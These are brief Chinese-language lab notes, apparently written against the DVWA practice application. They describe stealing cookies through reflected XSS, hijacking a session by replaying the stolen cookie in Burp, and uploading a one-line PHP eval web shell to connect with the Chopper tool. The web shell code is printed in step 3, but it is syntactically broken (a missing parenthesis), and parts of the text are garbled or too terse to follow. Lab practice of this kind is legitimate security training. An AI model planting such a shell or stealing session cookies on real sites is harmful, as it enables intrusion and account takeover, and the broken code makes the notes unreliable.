cookie是在http协议下,可以包含有关用户信息
1.存在反射型xss漏洞,可以利用以下链接来盗取cookie
复制url 打开phpstudy 根目录 www
xss(Reflected)中,输入=号右边的 进行重定向,然后cookie.txt中已经被写入
2.利用cookie进行会话劫持
burp 抓包,修改cookie的值为反射Xss盗取cookie的zhi
3.建立一个 <?php @eval($_POST['chopper'];?> php文件
打开本地dvwa File Upload界面
用菜刀链接,url地址,然后复制file upload获得的上二级在url后 chopper 添加 链接 就成功了